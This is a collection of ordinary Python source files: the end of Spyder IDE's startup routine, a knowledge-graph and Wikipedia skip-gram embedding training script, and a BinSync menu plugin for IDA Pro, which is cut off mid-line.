**** # We need to create MainWindow **here** to avoid passing pytest # options to Spyder if running_under_pytest(): try: from unittest.mock import Mock except ImportError: from mock import Mock # Python 2 options = Mock() options.working_directory = None options.profile = False options.multithreaded = False options.new_instance = False options.project = None options.window_title = None options.opengl_implementation = None options.debug_info = None options.debug_output = None if CONF.get('main', 'opengl') != 'automatic': option = CONF.get('main', 'opengl') set_opengl_implementation(option) app = initialize() window = run_spyder(app, options, None) return window # **** Collect command line options **** # Note regarding Options: # It's important to collect options before monkey patching sys.exit, # otherwise, argparse won't be able to exit if --help option is passed options, args = get_options() # **** Set OpenGL implementation to use **** if options.opengl_implementation: option = options.opengl_implementation set_opengl_implementation(option) else: if CONF.get('main', 'opengl') != 'automatic': option = CONF.get('main', 'opengl') set_opengl_implementation(option) # **** Handle hide_console option **** if options.show_console: print("(Deprecated) --show console does nothing, now the default " " behavior is to show the console, use --hide-console if you " "want to hide it") if set_attached_console_visible is not None: set_attached_console_visible(not options.hide_console or options.reset_config_files or options.reset_to_defaults or options.optimize or bool(get_debug_level())) # **** Set debugging info **** setup_logging(options) # **** Create the application **** app = initialize() # **** Handle other options **** if options.reset_config_files: # <!> Remove all configuration files! reset_config_files() return elif options.reset_to_defaults: # Reset Spyder settings to defaults CONF.reset_to_defaults(save=True) return elif options.optimize: # Optimize the whole Spyder's source code directory import spyder programs.run_python_script(module="compileall", args=[spyder.__path__[0]], p_args=['-O']) return # **** Show crash dialog **** if CONF.get('main', 'crash', False) and not DEV: CONF.set('main', 'crash', False) if SPLASH is not None: SPLASH.hide() QMessageBox.information( None, "Spyder", "Spyder crashed during last session.<br><br>" "If Spyder does not start at all and <u>before submitting a " "bug report</u>, please try to reset settings to defaults by " "running Spyder with the command line option '--reset':<br>" "<span style=\'color: #555555\'><b>spyder --reset</b></span>" "<br><br>" "<span style=\'color: #ff5555\'><b>Warning:</b></span> " "this command will remove all your Spyder configuration files " "located in '%s').<br><br>" "If Spyder still fails to launch, you should consult our " "comprehensive <b><a href=\"%s\">Troubleshooting Guide</a></b>, " "which when followed carefully solves the vast majority of " "crashes; also, take " "the time to search for <a href=\"%s\">known bugs</a> or " "<a href=\"%s\">discussions</a> matching your situation before " "submitting a report to our <a href=\"%s\">issue tracker</a>. " "Your feedback will always be greatly appreciated." "" % (get_conf_path(), __trouble_url__, __project_url__, __forum_url__, __project_url__)) # **** Create main window **** mainwindow = None try: mainwindow = run_spyder(app, options, args) except FontError as fontError: QMessageBox.information(None, "Spyder", "Spyder was unable to load the <i>Spyder 3</i> " "icon theme. That's why it's going to fallback to the " "theme used in Spyder 2.<br><br>" "For that, please close this window and start Spyder again.") CONF.set('appearance', 'icon_theme', 'spyder 2') except BaseException: CONF.set('main', 'crash', True) import traceback traceback.print_exc(file=STDERR) traceback.print_exc(file=open('spyder_crash.log', 'w')) if mainwindow is None: # An exception occured if SPLASH is not None: SPLASH.hide() return ORIGINAL_SYS_EXIT() if __name__ == "__main__": main()
train.py
# -*- coding: utf-8 -*- # # train.py # # Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # # ****************************** # NOTICE # This file was modified by Vardaan Pahuja for this project (email: pahuja.9@osu.edu) # ****************************** import math import os import logging import logging.handlers import time import numpy as np from multiprocessing import set_start_method from tqdm import tqdm import subprocess import joblib import dgl from dataloader import EvalDataset, TrainDataset, TrainDatasetNameGraph, NewBidirectionalOneShotIterator from dataloader import get_dataset from utils import get_compatible_batch_size, save_model, CommonArgParser from wiki2vec.dictionary import Dictionary backend = os.environ.get('DGLBACKEND', 'pytorch') import torch.multiprocessing as mp from train_pytorch import load_model from train_pytorch import train_ke, train_mp_ke from train_pytorch import test, test_mp # import dist_train from skipGramModel import * from torch import optim import json import multiprocessing import random class ArgParser(CommonArgParser): def __init__(self): super(ArgParser, self).__init__() self.add_argument('--gpu', type=int, default=[-1], nargs='+', help='A list of gpu ids, e.g. 0 1 2 4') self.add_argument("--cuda", action='store_true', default=False, help="enable cuda") self.add_argument('--mix_cpu_gpu', action='store_true', help='Training a knowledge graph embedding model with both CPUs and GPUs.'\ 'The embeddings are stored in CPU memory and the training is performed in GPUs.'\ 'This is usually used for training a large knowledge graph embeddings.') self.add_argument('--valid', action='store_true', help='Evaluate the model on the validation set in the training.') self.add_argument('--rel_part', action='store_true', help='Enable relation partitioning for multi-GPU training.') self.add_argument('--async_update', action='store_true', help='Allow asynchronous update on node embedding for multi-GPU training.'\ 'This overlaps CPU and GPU computation to speed up.') self.add_argument('--dump-db-file', type=str, required=True, help='name of output db file') self.add_argument('--dictionary-file', type=str, required=True, help='name of dictionary file') self.add_argument('--mention-db-file', type=str, required=True, help='name of mention db file') self.add_argument('--link-graph-file', type=str, default=None, help='name of link graph file') self.add_argument('--entities-per-page', type=int, default=10, help='For processing each page, the ' 'specified number of randomly chosen entities are used to predict their ' 'neighboring entities in the link graph') self.add_argument('--window', type=int, default=5, help='size of window for skip-gram') self.add_argument('--negative', type=int, default=15, help='no. of negatives for skip-gram') self.add_argument('--sg_batch_size', type=int, default=100, help='batch size for skip gram model') self.add_argument('--sg_lr', type=float, default=0.025, help='learning rate for skip gram model') #TODO: check LR initial value self.add_argument("--sample", type=float, default=1e-4, help="subsample threshold") self.add_argument('--num_proc_train', type=int, default=-1, help='no. of training CPU/GPU proc.') # self.add_argument("--sg_iters", type=int, default=5, help="no. of iters of SG model") self.add_argument("--n_iters", type=int, default=5, help="no. of iters of combined model") self.add_argument("--timeout", type=int, default=1000, help="time (in sec.) to wait before for incoming data batches before exiting training") self.add_argument("--balance_param", type=float, default=100.0, help="value of balance parameter") self.add_argument("--seed", type=int, default=11117) self.add_argument("--transe-entity-ckpt-path", type=str, default=None) self.add_argument("--transe-relation-ckpt-path", type=str, default=None) self.add_argument("--sg-ckpt-emb0-path", type=str, default=None) self.add_argument("--sg-ckpt-emb1-path", type=str, default=None) self.add_argument("--reg-loss-start-epoch", type=int, default=1) self.add_argument("--use-input-embedding", action='store_true', default=False) self.add_argument("--start-epoch", type=int, default=0) self.add_argument("--proj-layer-ckpt-path", type=str, default=None) self.add_argument("--sg-reg-optimizer", type=str, choices=['sgd', 'adam']) self.add_argument("--kb-process-method", type=str, choices=['forkserver', 'fork'], default='fork') self.add_argument('--wiki-link-file', type=str, required=True, help='path to wikipedia links file') def listener(q, args): '''listens for messages on the q, writes to file. ''' if args.start_epoch==0: loss_log_file = os.path.join(args.save_path, 'train_loss.log') else: loss_log_file = os.path.join(args.save_path, 'train_loss_{}.log'.format(args.start_epoch)) with open(loss_log_file, 'w') as f: log_id = 0 while 1: m = q.get() if m == 'kill': f.write('end of log') f.flush() break f.write(str(m) + '\n') if log_id % 1000 == 0: f.flush() log_id += 1 def main(): args = ArgParser().parse_args() print(args.use_input_embedding) # set seed torch.manual_seed(args.seed) np.random.seed(args.seed) random.seed(args.seed) dgl.random.seed(args.seed) logging.basicConfig(format='%(name)s - %(message)s', level=logging.INFO) logger = multiprocessing.get_logger() logger.warning('This will get logged to a file') # queue for log messages manager = mp.Manager() log_queue = manager.Queue() listener_process = multiprocessing.Process(target=listener, args=(log_queue, args)) listener_process.start() set_start_method('forkserver', force=True) # added for SG model # restrict no. of processes for TransE model to 8 vars(args)['num_proc_sg'] = args.num_proc if args.num_proc >=8: args.num_proc = 8 if args.num_proc_train == -1: args.num_proc_train = args.num_proc_sg init_time_start = time.time() wiki_link_dict = json.load(open(args.wiki_link_file)) # mapping from wikidata entity IDs to wikipedia entity names dictionary = Dictionary.load(args.dictionary_file) # load dataset and samplers dataset = get_dataset(args.data_path, args.dataset, args.format, dictionary, wiki_link_dict, args.data_files) if args.neg_sample_size_eval < 0: args.neg_sample_size_eval = dataset.n_entities args.batch_size = get_compatible_batch_size(args.batch_size, args.neg_sample_size) args.batch_size_eval = get_compatible_batch_size(args.batch_size_eval, args.neg_sample_size_eval) # We should turn on mix CPU-GPU training for multi-GPU training. if len(args.gpu) > 1: args.mix_cpu_gpu = True if args.num_proc < len(args.gpu): args.num_proc = len(args.gpu) # We need to ensure that the number of processes should match the number of GPUs. if len(args.gpu) > 1 and args.num_proc > 1: assert args.num_proc % len(args.gpu) == 0, \ 'The number of processes needs to be divisible by the number of GPUs' # For multiprocessing training, we need to ensure that training processes are synchronized periodically. if args.num_proc > 1: args.force_sync_interval = 1000 args.eval_filter = not args.no_eval_filter if args.neg_deg_sample_eval: assert not args.eval_filter, "if negative sampling based on degree, we can't filter positive edges." args.soft_rel_part = args.mix_cpu_gpu and args.rel_part train_data = TrainDataset(dataset, args, ranks=args.num_proc) print('no. of nodes = {}'.format(train_data.g.number_of_nodes())) print('no. of edges = {}'.format(train_data.g.number_of_edges())) if args.num_proc > 1: train_samplers = [] for i in range(args.num_proc): # print('rank = {}'.format(i)) train_sampler_head = train_data.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='head', num_workers=args.num_proc, shuffle=True, exclude_positive=False, rank=i) train_sampler_tail = train_data.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='tail', num_workers=args.num_proc, shuffle=True, exclude_positive=False, rank=i) train_samplers.append(NewBidirectionalOneShotIterator(train_sampler_head, train_sampler_tail, args.neg_sample_size, args.neg_sample_size, True, dataset.n_entities)) else: # This is used for debug train_sampler_head = train_data.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='head', num_workers=args.num_proc, shuffle=True, exclude_positive=False) train_sampler_tail = train_data.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='tail', num_workers=args.num_proc, shuffle=True, exclude_positive=False) train_sampler = NewBidirectionalOneShotIterator(train_sampler_head, train_sampler_tail, args.neg_sample_size, args.neg_sample_size, True, dataset.n_entities) train_data_name_graph = TrainDatasetNameGraph(dataset, args, ranks=args.num_proc) print('no. of nodes (name graph) = {}'.format(train_data_name_graph.g.number_of_nodes())) print('no. of edges (name graph) = {}'.format(train_data_name_graph.g.number_of_edges())) if args.num_proc > 1: train_samplers_name_graph = [] for i in range(args.num_proc): # print('rank = {}'.format(i)) train_sampler_head_name_graph = train_data_name_graph.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='head', num_workers=args.num_proc, shuffle=True, exclude_positive=False, rank=i) train_sampler_tail_name_graph = train_data_name_graph.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='tail', num_workers=args.num_proc, shuffle=True, exclude_positive=False, rank=i) train_samplers_name_graph.append(NewBidirectionalOneShotIterator(train_sampler_head_name_graph, train_sampler_tail_name_graph, args.neg_sample_size, args.neg_sample_size, True, dataset.n_entities)) else: # This is used for debug train_sampler_head_name_graph = train_data_name_graph.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='head', num_workers=args.num_proc, shuffle=True, exclude_positive=False) train_sampler_tail_name_graph = train_data_name_graph.create_sampler(args.batch_size, args.neg_sample_size, args.neg_sample_size, mode='tail', num_workers=args.num_proc, shuffle=True, exclude_positive=False) train_sampler_name_graph = NewBidirectionalOneShotIterator(train_sampler_head_name_graph, train_sampler_tail_name_graph, args.neg_sample_size, args.neg_sample_size, True, dataset.n_entities) # if there is no cross partition relaiton, we fall back to strict_rel_part args.strict_rel_part = args.mix_cpu_gpu and (train_data.cross_part == False) args.num_workers = 8 # fix num_worker to 8 if args.valid or args.test: if len(args.gpu) > 1: args.num_test_proc = args.num_proc if args.num_proc < len(args.gpu) else len(args.gpu) else: args.num_test_proc = args.num_proc if args.valid: assert dataset.valid is not None, 'validation set is not provided' if args.test: assert dataset.test is not None, 'test set is not provided' eval_dataset = EvalDataset(dataset, args) if args.valid: if args.num_proc > 1: valid_sampler_heads = [] valid_sampler_tails = [] for i in range(args.num_proc): # print('rank = {}'.format(i)) valid_sampler_head = eval_dataset.create_sampler('valid', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-head', num_workers=args.num_proc, rank=i, ranks=args.num_proc) valid_sampler_tail = eval_dataset.create_sampler('valid', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-tail', num_workers=args.num_proc, rank=i, ranks=args.num_proc) valid_sampler_heads.append(valid_sampler_head) valid_sampler_tails.append(valid_sampler_tail) else: # This is used for debug valid_sampler_head = eval_dataset.create_sampler('valid', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-head', num_workers=args.num_proc, rank=0, ranks=1) valid_sampler_tail = eval_dataset.create_sampler('valid', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-tail', num_workers=args.num_proc, rank=0, ranks=1) if args.test: if args.num_test_proc > 1: test_sampler_tails = [] test_sampler_heads = [] for i in range(args.num_test_proc): test_sampler_head = eval_dataset.create_sampler('test', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-head', num_workers=1, rank=i, ranks=args.num_test_proc) test_sampler_tail = eval_dataset.create_sampler('test', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-tail', num_workers=1, rank=i, ranks=args.num_test_proc) test_sampler_heads.append(test_sampler_head) test_sampler_tails.append(test_sampler_tail) else: test_sampler_head = eval_dataset.create_sampler('test', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-head', num_workers=1, rank=0, ranks=1) test_sampler_tail = eval_dataset.create_sampler('test', args.batch_size_eval, args.neg_sample_size_eval, args.neg_sample_size_eval, args.eval_filter, mode='chunk-tail', num_workers=1, rank=0, ranks=1) # load model model = load_model(logger, args, dataset.n_entities, dataset.n_relations) # KE model # load transE ckpt if args.transe_entity_ckpt_path: model.entity_emb.emb = torch.Tensor(np.load(args.transe_entity_ckpt_path)) if args.transe_relation_ckpt_path: model.relation_emb.emb = torch.Tensor(np.load(args.transe_relation_ckpt_path)) sg_model = skipGramModel(dictionary.word_size+dictionary.entity_size, args.hidden_dim, args.window, args.negative) if args.cuda: sg_model = sg_model.cuda() sg_model.share_memory() # load skip-gram ckpt if args.sg_ckpt_emb0_path: sg_model.emb0_lookup.weight.data.copy_(torch.Tensor(np.load(args.sg_ckpt_emb0_path))) if args.sg_ckpt_emb1_path: sg_model.emb1_lookup.weight.data.copy_(torch.Tensor(np.load(args.sg_ckpt_emb1_path))) if args.proj_layer_ckpt_path: model.proj_layer.load_state_dict(torch.load(args.proj_layer_ckpt_path)) sg_reg_optimizer_list = [] for i in range(args.num_proc): if args.sg_reg_optimizer == 'sgd': sg_reg_optimizer_list.append(optim.SGD(sg_model.parameters(), lr=args.sg_lr * (1 - word_count_actual.value / (args.n_iters * word_count)))) else: sg_reg_optimizer_list.append(optim.SparseAdam(sg_model.parameters())) # proj_layer = nn.Linear(model.entity_dim, model.entity_dim) proj_layer_optimizer_list = [] for i in range(args.num_proc): proj_layer_optimizer_list.append(optim.Adam(model.proj_layer.parameters())) if args.num_proc > 1 or args.async_update: model.share_memory() model.proj_layer.share_memory() # print('entity2id = {}'.format(dataset.entity2id)) # print('relation2id = {}'.format(dataset.relation2id)) id2entity_map = {val:key for key,val in dataset.entity2id.items()} print('wikipedia word vocab size = {}'.format(dictionary.word_size)) print('wikipedia entity vocab size = {}'.format(dictionary.entity_size)) print('wikidata entity vocab size = {}'.format(dataset.n_entities)) # We need to free all memory referenced by dataset. # eval_dataset = None # dataset = None print('Total initialize time {:.3f} seconds'.format(time.time() - init_time_start)) # train start = time.time() rel_parts = train_data.rel_parts if args.strict_rel_part or args.soft_rel_part else None cross_rels = train_data.cross_rels if args.soft_rel_part else None max_step_per_epoch = int(train_data.g.number_of_edges()/ (args.batch_size * args.num_proc))+1 vars(args)['max_step_per_epoch'] = max_step_per_epoch print('max_step_per_epoch = {}'.format(max_step_per_epoch)) max_step_per_epoch_name_graph = int(train_data_name_graph.g.number_of_edges()/ (args.batch_size * args.num_proc))+1 vars(args)['max_step_per_epoch_name_graph'] = max_step_per_epoch_name_graph print('max_step_per_epoch_name_graph = {}'.format(max_step_per_epoch_name_graph)) # TODO: change iter_id ctx = torch.multiprocessing.get_context(args.kb_process_method) # ctx = torch.multiprocessing.get_context('forkserver') # ctx = torch.multiprocessing.get_context('spawn') print('flag 6') os.environ['TMPDIR'] = args.save_path torch.manual_seed(args.seed) np.random.seed(args.seed) random.seed(args.seed) dgl.random.seed(args.seed) common_node_ids_dict_idx = list(filter(lambda x:x[1]!=-1, map(lambda x:(x[0], dictionary.get_entity_index(x[1])), filter(lambda x: x[1], map(lambda x:(x[0], wiki_link_dict.get(x[1], None)), list(id2entity_map.items())))))) # print(list(common_node_ids_dict_idx)) common_node_ids = [x[0] for x in common_node_ids_dict_idx] # common_node_ids_tensor = torch.tensor(common_node_ids) # TODO: convert the common node ids to corresponding wiki versions common_node_ids_wiki_version = [dataset.entity2id[dataset.id2entity_map[x] + '-wiki'] for x in common_node_ids] common_node_ids_wiki_version_tensor = torch.tensor(common_node_ids_wiki_version) # print('common_node_ids_wiki_version_tensor = {}'.format(common_node_ids_wiki_version_tensor)) common_entity_sg_idx = torch.tensor([x[1] for x in common_node_ids_dict_idx]) # print([dictionary.get_entity_by_index(x).title for x in common_entity_sg_idx]) # print([dataset.id2entity_map[x] for x in common_node_ids_wiki_version]) for iter_id in range(args.start_epoch, args.n_iters): epoch_start_time = time.time() sg_model.cpu() log_queue.put('Epoch {} of TransE model'.format(iter_id)) #*********************************** # train 1 epoch of TransE model #*********************************** if args.num_proc > 1: procs = [] barrier = ctx.Barrier(args.num_proc) for i in range(args.num_proc): valid_sampler = [valid_sampler_heads[i], valid_sampler_tails[i]] if args.valid else None # proc = mp.Process(target=train_process, args=(p_id, dump_db, dictionary, tokenizer, word_list, word_count_actual, freq, args, model)) proc = ctx.Process(target=train_mp_ke, args=(args, iter_id, False, args.reg_loss_start_epoch, args.use_input_embedding, model, sg_model, log_queue, sg_reg_optimizer_list[i], proj_layer_optimizer_list[i], id2entity_map, wiki_link_dict, train_samplers[i], valid_sampler, i, rel_parts, cross_rels, barrier)) procs.append(proc) proc.start() print('TransE proc {} started'.format(i)) for i,proc in enumerate(procs): proc.join() print('TransE proc {} joined'.format(i)) # print(model.proj_layer.bias) else: valid_samplers = [valid_sampler_head, valid_sampler_tail] train_ke(args, iter_id, False, args.reg_loss_start_epoch, args.use_input_embedding, model, sg_model, log_queue, sg_reg_optimizer_list[0], proj_layer_optimizer_list[0], id2entity_map, wiki_link_dict, train_sampler, valid_samplers, 0, rel_parts, cross_rels) if args.num_proc > 1: procs = [] barrier = ctx.Barrier(args.num_proc) for i in range(args.num_proc): valid_sampler = None # proc = mp.Process(target=train_process, args=(p_id, dump_db, dictionary, tokenizer, word_list, word_count_actual, freq, args, model)) proc = ctx.Process(target=train_mp_ke, args=(args, iter_id, True, args.reg_loss_start_epoch, args.use_input_embedding, model, sg_model, log_queue, sg_reg_optimizer_list[i], proj_layer_optimizer_list[i], id2entity_map, wiki_link_dict, train_samplers_name_graph[i], valid_sampler, i, rel_parts, cross_rels, barrier)) procs.append(proc) proc.start() print('TransE proc {} started'.format(i)) for i,proc in enumerate(procs): proc.join() print('TransE proc {} joined'.format(i)) # print(model.proj_layer.bias) else: valid_samplers = None train_ke(args, iter_id, True, args.reg_loss_start_epoch, args.use_input_embedding, model, sg_model, log_queue, sg_reg_optimizer_list[0], proj_layer_optimizer_list[0], id2entity_map, wiki_link_dict, train_sampler_name_graph, valid_samplers, 0, rel_parts, cross_rels) print('Iteration {} of TransE model completed in {} sec.'.format(iter_id, time.time()-epoch_start_time)) model.entity_emb.save(args.save_path, args.dataset+'_'+model.model_name+'_entity') model.relation_emb.save(args.save_path, args.dataset+'_'+model.model_name+'_relation') # print(model.proj_layer.bias) # print(model.proj_layer.state_dict()['bias']) torch.save(model.proj_layer.state_dict(), os.path.join(args.save_path, 'proj_layer'+'.pt')) # TODO: copy embeddings from transE to skip-gram sg_model.emb0_lookup.weight.data[common_entity_sg_idx] = model.entity_emb.emb[common_node_ids_wiki_version_tensor] # save skip-gram pytorch model weights to disk for use by wikipedia2vec API # sg_emb0_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'_{}'.format(iter_id)+'.npy') # save intermediate emb0 embedding sg_emb0_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'.npy') np.save(sg_emb0_fname, sg_model.emb0_lookup.weight.data.cpu().numpy()) # sg_emb1_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'_{}'.format(iter_id)+'.npy') # save intermediate emb1 embedding sg_emb1_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'.npy') np.save(sg_emb1_fname, sg_model.emb1_lookup.weight.data.cpu().numpy()) epoch_start_time = time.time() log_queue.put('Epoch {} of skip-gram model'.format(iter_id)) #*********************************** # train 1 epoch of SG model #*********************************** subprocess.run(['wikinew', 'train-embedding', args.dump_db_file, args.dictionary_file, sg_emb0_fname, sg_emb1_fname, str(args.n_iters), str(iter_id), os.path.join(args.save_path, 'emb_file'), '--pool-size', str(args.num_proc_train), '--dim-size', str(args.hidden_dim), '--mention-db', args.mention_db_file, '--link-graph', args.link_graph_file]) print('Iteration {} of skip-gram model completed in {} sec.'.format(iter_id, time.time()-epoch_start_time)) # torch.cuda.synchronize() # copy skip-gram model weights from 'model_file' to PyTorch model emb_combined = joblib.load(os.path.join(args.save_path, 'emb_file')) sg_model.emb0_lookup.weight.data.copy_(torch.tensor(emb_combined['syn0'])) sg_model.emb1_lookup.weight.data.copy_(torch.tensor(emb_combined['syn1'])) # sg_emb0_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'_{}'.format(iter_id)+'.npy') sg_emb0_iter_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'_{}'.format(iter_id)+'.npy') sg_emb0_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'.npy') np.save(sg_emb0_fname, sg_model.emb0_lookup.weight.data.cpu().numpy()) # sg_emb1_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'_{}'.format(iter_id)+'.npy') sg_emb1_iter_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'_{}'.format(iter_id)+'.npy') sg_emb1_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'.npy') np.save(sg_emb1_fname, sg_model.emb1_lookup.weight.data.cpu().numpy()) # TODO: copy embeddings from skip-gram to TransE model.entity_emb.emb[common_node_ids_wiki_version_tensor] = sg_model.emb0_lookup.weight.data[common_entity_sg_idx] print('training takes {} seconds'.format(time.time() - start)) model.entity_emb.save(args.save_path, args.dataset+'_'+model.model_name+'_entity') model.relation_emb.save(args.save_path, args.dataset+'_'+model.model_name+'_relation') sg_emb0_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb0_sg'+'.npy') np.save(sg_emb0_fname, sg_model.emb0_lookup.weight.data.cpu().numpy()) sg_emb1_fname = os.path.join(args.save_path, args.dataset+'_'+model.model_name+'_emb1_sg'+'.npy') np.save(sg_emb1_fname, sg_model.emb1_lookup.weight.data.cpu().numpy()) log_queue.put("kill") listener_process.join() if __name__ == '__main__': main()
sync_menu.py
from PyQt5.QtWidgets import QDialog, QVBoxLayout, QLineEdit, QHBoxLayout, QLabel, QPushButton, QGroupBox, \ QMessageBox, QCheckBox, QWidget, QFileDialog, QApplication, QComboBox, QTableWidget, QTableWidgetItem, \ QDialogButtonBox, QGridLayout, QHeaderView, QTableView, QAbstractItemView import sip import threading import idaapi import idautils import binsync.data from .. import compat from ..controller import BinsyncController from ..controller import UpdateTask # # MenuDialog Box for Binsync Actions # class BinsyncMenuActionItem: SYNC_SELECTED_FUNCTIONS = "Sync Selected Functions" SYNC_ALL_FUNCTIONS = "Sync All Functions" SYNC_STRUCTS = "Sync All Structs" TOGGLE_AUTO_SYNC = "Toggle Auto-Sync" class MenuDialog(QDialog): def __init__(self, controller, selected_functions, parent=None): super(MenuDialog, self).__init__(parent) self.controller = controller self.selected_functions = selected_functions self.select_table_widget = None self.all_table_widget = None self.active_table = None self._init_widget() def _init_widget(self): label = QLabel("Binsync Action") self.combo = QComboBox() self.combo.addItems([BinsyncMenuActionItem.SYNC_SELECTED_FUNCTIONS, BinsyncMenuActionItem.SYNC_ALL_FUNCTIONS, BinsyncMenuActionItem.SYNC_STRUCTS, BinsyncMenuActionItem.TOGGLE_AUTO_SYNC]) self.combo.currentTextChanged.connect(self._on_combo_change) # build two versions of the table # TODO: eventually remove this. Its a hack to show all the users # in the case that we want to pull structs directly self.select_table_widget = self._build_table_widget( self._build_menu_table_for_selected_funcs(self.selected_functions) ) self.all_table_widget = self._build_table_widget( self._build_menu_table_for_all_users() ) # hide one of the tables, make the other active self.all_table_widget.hide() self.active_table = self.select_table_widget box = QDialogButtonBox( QDialogButtonBox.Ok | QDialogButtonBox.Cancel, centerButtons=True, ) box.accepted.connect(self.accept) box.rejected.connect(self.reject) lay = QGridLayout(self) lay.addWidget(label, 0, 0) lay.addWidget(self.combo, 0, 1) lay.addWidget(self.select_table_widget, 1, 0, 1, 2) lay.addWidget(self.all_table_widget, 1, 0, 1, 2) lay.addWidget(box, 2, 0, 1, 2) self.resize(640, 240) # # Table Builders # def _build_table_widget(self, menu_table): table_widget = QTableWidget(len(menu_table), 4) table_widget.setHorizontalHeaderLabels( "User;Last Push;Func Addr;Remote Name".split(";") ) header = table_widget.horizontalHeader() header.setSectionResizeMode(0, QHeaderView.ResizeToContents) header.setSectionResizeMode(1, QHeaderView.Stretch) header.setSectionResizeMode(2, QHeaderView.Stretch) for item, row in zip(menu_table, range(len(menu_table))): user_item = QTableWidgetItem(item[0]) push_item = QTableWidgetItem(item[1]) func_item = QTableWidgetItem(item[2]) func_name_item = QTableWidgetItem(item[3]) table_widget.setItem(row, 0, user_item) table_widget.setItem(row, 1, push_item) table_widget.setItem(row, 2, func_item) table_widget.setItem(row, 3, func_name_item) # set more table properties table_widget.setSelectionBehavior(QAbstractItemView.SelectRows) table_widget.setSelectionMode(QAbstractItemView.SingleSelection) table_widget.setEditTriggers(QAbstractItemView.NoEditTriggers) table_widget.doubleClicked.connect(self._on_click) return table_widget def _on_click(self, index): self.active_table.selectRow(index.row()) self.accept() def _build_menu_table_for_all_users(self): if self.controller.client.has_remote: self.controller.client.init_remote() menu_table = list() for user in self.controller.users(): state = self.controller.client.get_state(user=user.name) artifact, push_time = state.get_last_push_for_artifact_type(binsync.ArtifactGroupType.FUNCTION) if artifact is None or push_time == -1: row = [user.name, push_time, "", ""] else: local_name = compat.get_func_name(artifact) func = hex(artifact) row = [user.name, push_time, func, local_name] menu_table.append(row) menu_table.sort(key=lambda r: r[1], reverse=True) for row in menu_table: if row[1] == -1: time_ago = "" else: time_ago = BinsyncController.friendly_datetime(row[1]) row[1] = time_ago return menu_table def _build_menu_table_for_selected_funcs(self, selected_funcs): if self.controller.client.has_remote: self.controller.client.init_remote() # Build out the menu dictionary for the table menu_table = list() # [username, push_time, func_addr, local_name] for user in self.controller.users(): state = self.controller.client.get_state(user=user.name) relevant_funcs = set(state.functions.keys()).intersection(selected_funcs) # only display users who worked on the selected functions if not relevant_funcs: continue latest_time, latest_func, remote_name = -1, -1, "" for func_addr in relevant_funcs: sync_func: binsync.data.Function = state.functions[func_addr] if sync_func.last_change > latest_time: latest_time, latest_func, remote_name = sync_func.last_change, sync_func.addr, sync_func.name if sync_func.name else "" if latest_time == -1: continue #local_name = compat.get_func_name(latest_func) func = hex(latest_func) row = [user.name, latest_time, func, remote_name] menu_table.append(row) # sort menu_table.sort(key=lambda r: r[1], reverse=True) # fix each time for row in menu_table: time_ago = BinsyncController.friendly_datetime(row[1]) row[1] = time_ago return menu_table # # Action Selection Box Callback # def _on_combo_change(self, value): self._hide_all_tables() if value == BinsyncMenuActionItem.SYNC_SELECTED_FUNCTIONS or value == BinsyncMenuActionItem.TOGGLE_AUTO_SYNC: self.select_table_widget.show() self.active_table = self.select_table_widget else: self.all_table_widget.show() self.active_table = self.all_table_widget def _hide_all_tables(self): self.select_table_widget.hide() self.all_table_widget.hide() # # External API # def get_selected_action(self): # defaults to "Sync" action = self.combo.currentText() selected_rows = self.active_table.selectionModel().selectedRows() if len(selected_rows) == 0: return action, None selected_user = selected_rows[0].data() return action, selected_user # # IDA Context Menu Hook # class IDACtxEntry(idaapi.action_handler_t): """ A basic Context Menu class to utilize IDA's action handlers. """ def __init__(self, action_function): idaapi.action_handler_t.__init__(self) self.action_function = action_function def activate(self, ctx): """ Execute the embedded action_function when this context menu is invoked. """ self.action_function() return 1 def update(self, ctx): """ Ensure the context menu is always available in IDA. """ return idaapi.AST_ENABLE_ALWAYS # # Actions # class SyncMenu: def __init__(self, controller): self.controller: BinsyncController = controller self.ctx_menu = IDACtxEntry(self.open_sync_menu) def open_sync_menu(self): """ Opens sync menu and gives the optinal actions """ selected_functions = self._get_selected_funcs() # open a dialog to make sync actions dialog = MenuDialog(self.controller, selected_functions) result = dialog.exec_() # only parse the action if the user accepted the result if result != QDialog.Accepted: return # parse action action, user = dialog.get_selected_action() # for every selected function perform the action! for func_addr in selected_functions: ida_func = 